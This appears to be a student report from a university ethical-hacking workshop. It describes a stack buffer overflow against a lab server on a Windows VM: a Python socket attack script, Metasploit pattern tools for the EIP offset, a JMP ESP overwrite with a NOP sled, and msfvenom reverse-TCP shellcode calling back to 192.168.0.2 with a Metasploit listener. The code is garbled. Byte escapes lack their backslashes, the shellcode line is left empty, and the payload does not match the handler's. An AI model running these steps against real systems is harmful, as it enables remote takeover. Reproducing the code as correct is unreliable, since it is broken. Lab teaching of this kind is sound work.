CSI3208 Ethical Hacking And Defence

Workshop : Exploit Development

You are to write a technical outline of how the exploit you developed in the workshop operates, from the initial connection, through to compromise.

 

You should target a primarily non-technical audience in your report. 

Preparation

1. Open Kali virtual machine
2. Open Win32 Buffer Victim virtual machine
3. Ensure both are set to NAT networking
4. Check the IP addresses on both

Exploit Development

The workshop is created for learning lesson on ethical hacking and defence using two virtual machines. In the workshop two machines are created in VmWare one is kali linux used for performing the attack and one is a windows client machine. In the network configuration both of the machines are configured to NAT such that the machines can communicate with the private and the public address and the Ip address is checked for each of the machine. Thus the preparation stage is completed.

In the finding and overflow stage immunity debugger is installed in the windows machine and a file server.exe is loaded in the immunity debugger and executed by pressing F9. In the kali linux a file is created with the name attack.py and the following codes given in the workshop is inputted in the file.

#!/usr/bin/python

import sys

import os

import socket

host = sys.argv[1]

port = int(sys.argv[2])

# Testing

buffer = "x41"*500

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

con = s.connect((host, port))

s.send(buffer)

s.close()

In the kali linux virtual machine the command ‘python attack.py IP_ADDRESS 1337’ is executed and in the IP address field the IP address of the victim machine is inputted. The windows environment is opened for passing the exception for its execution and the following screen appears with similar type of values. The value of the EIP and the EBP is changed to the values inputted by the attacker and the ESP point pointing to the different memory region contains the value injected from the attacker machine.

In the stage of weaponizing the vulnerability the immunity debugger installed in the victim machine is used for restarting the server.exe and starting its execution. In the kali virtual machine the Metasploit tool is used for performing an exploit on the network and it is done by running the following command.

“cd /usr/share/metasploit-framework/tools/exploit”, followed by

“./pattern_create.rb -l 5000 | nc IP_ADDRESS 1337”.

Here also the IP address of the victim machine is inputted for performing the exploitation and identification of the vulnerability of the machine. The exception is passed on the victim machine and the resultant value of EIP is noted. The following command is used for the identification of the offset value for EIP:

“./pattern_offset.rb -l 5000 -q 37694136”

The result is noted and an address for the code is used for jumping to the ESP and the server.exe is restarted and the execution is started. After starting the execution the executable modules are viewed and searched for JMP ESP for finding the result of GDI32. The memory address is noted and the code of the attack.py is modified using the following command.

#!/usr/bin/python

import sys

import os

import socket

host = sys.argv[1]

port = int(sys.argv[2])

# EIP is overwritten at 260 bytes

buffer = "x41"*260

# Overwrite EIP with JMP ESP

buffer += "x78x16xF3x77"

# NOPSLED

buffer += "x90"*128

# Shellcode

buffer +=

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

con = s.connect((host, port))

s.send(buffer)

s.close()

A shell code is developed in Kali linux using the following command

“msfvenom -p windows/shell/reverse_tcp LHOST=192.168.0.2 -e x86/shikata_ga_nai -b 'x00xffx0ax0bx0d' -i 3 -f python”

The attack.py file is modified for the inclusion of the shellcode generated form the above command.

For the exploitation the following command is used

msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.0.2; exploit"

The immunity debugger is closed and the server.exe is opened in the victim machine and on the linux the following command is executed

“python attack.py IP_ADDRESS 1337”

Bibliography

Li, C. (2015). Penetration testing curriculum development in practice. Journal of Information Technology Education: Innovations in Practice, 14(1), 85-99.

Rao, G. S., Kumar, P. N., Swetha, P., & BhanuKiran, G. (2014, December). Security assessment of computer networks-an ethical hacker's perspective. In Computer and Communications Technologies (ICCCT), 2014 International Conference on (pp. 1-5). IEEE.

Thomas, G., Burmeister, O. K., & Low, G. (2017). Issues of Implied Trust in Ethical Hacking. In Proceedings of The 28th Australasian Conference on Information Systems, December(pp. 4-6).

Yaghmaei, E., van de Poel, I., Christen, M., Gordijn, B., Kleine, N., Loi, M., ... & Weber, K. (2017). Canvas White Paper 1–Cybersecurity and Ethics.